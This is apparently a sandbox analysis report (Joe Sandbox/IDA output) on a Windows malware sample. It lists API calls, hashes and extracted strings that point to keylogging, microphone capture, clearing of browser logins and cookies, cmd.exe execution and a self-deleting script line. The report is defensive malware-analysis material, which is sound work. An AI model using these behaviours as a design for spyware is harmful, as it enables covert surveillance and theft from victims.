• _free.LIBCMT ref: 004427F9
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\4XYAW8PbZH.exe
• API String ID: 2506810119-3692865632
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
  • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
  • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$8>G
• API String ID: 368326130-2663660666
APIs
  • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
• ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
• ExitProcess.KERNEL32 ref: 0040C63E
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CreateExecuteExitFileProcessShell
• String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
• API String ID: 2309964880-3562070623
APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
APIs
• CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
• GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
• __dosmaperr.LIBCMT ref: 0044AB0E
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: `@
• API String ID: 2583163307-951712118
APIs
• GetLocalTime.KERNEL32(?), ref: 00404946
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
• CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040495C
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
• CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
• SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
  • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
  • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
APIs
• RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
• RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
• RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: Control Panel\Desktop
• API String ID: 1818849710-27424756
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
• RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
APIs
• TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
• UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
• TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: TerminateThread$HookUnhookWindows
• String ID: pth_unenc
• API String ID: 3123878439-4028850238
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• GetProcAddress.KERNEL32(00000000), ref: 00401441
Strings
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
• GetProcAddress.KERNEL32(00000000), ref: 004014E6
Strings
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
APIs
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
APIs
Strings
• Cleared browsers logins and cookies., xrefs: 0040B8EF
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
Strings
Yara matches
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID: @CG$exepath$BG
• API String ID: 4119054056-3221201242
APIs
  • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
  • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
  • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
Strings
Yara matches
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
APIs
• CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
• WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
• CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• API String ID: 3604237281-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
  • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
  • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
• _UnwindNestedFrames.LIBCMT ref: 00438134
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
• CallCatchBlock.LIBVCRUNTIME ref: 0043816D
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• API String ID: 737400349-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
• GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• API String ID: 3177248105-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
• GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B657
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B67C
• CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B68A
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• API String ID: 3919263394-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 00418529
• GetSystemMetrics.USER32(0000004D), ref: 0041852F
• GetSystemMetrics.USER32(0000004E), ref: 00418535
• GetSystemMetrics.USER32(0000004F), ref: 0041853B
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: MetricsSystem
• API String ID: 4116985748-0
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcess
• String ID:
• API String ID: 39102293-0
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00441F7D
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: _memcmp
• String ID: 4[G$4[G
• API String ID: 2931989736-4028565467
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CountEventTick
• String ID: >G
• API String ID: 180926312-1296849874
APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Info
• String ID: $vD
• API String ID: 1807457897-3636070802
APIs
• GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509C9
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
APIs
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 004049E5
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• CloseHandle.KERNEL32(?), ref: 0040A7CA
• UnhookWindowsHookEx.USER32 ref: 0040A7DD
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
                                                                                                                                                                                              • Opcode ID: a6ae9b93d039332b163c31e72d4f3da944da033372009bc833185b2393ae89fc
                                                                                                                                                                                              • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                                                                                                              • Opcode Fuzzy Hash: a6ae9b93d039332b163c31e72d4f3da944da033372009bc833185b2393ae89fc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                              • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                              • String ID: T=G
                                                                                                                                                                                              • API String ID: 2315374483-379896819
                                                                                                                                                                                              • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LocaleValid
                                                                                                                                                                                              • String ID: IsValidLocaleName$z=D
                                                                                                                                                                                              • API String ID: 1901932003-2791046955
                                                                                                                                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                              • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID: T=G$T=G
                                                                                                                                                                                              • API String ID: 3519838083-3732185208
                                                                                                                                                                                              • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                                                                                                              • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                                                                                • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                              • String ID: [AltL]$[AltR]
                                                                                                                                                                                              • API String ID: 2738857842-2658077756
                                                                                                                                                                                              • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                                                                                                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00448835
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                              • String ID: `@$`@
                                                                                                                                                                                              • API String ID: 1353095263-20545824
                                                                                                                                                                                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                              • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
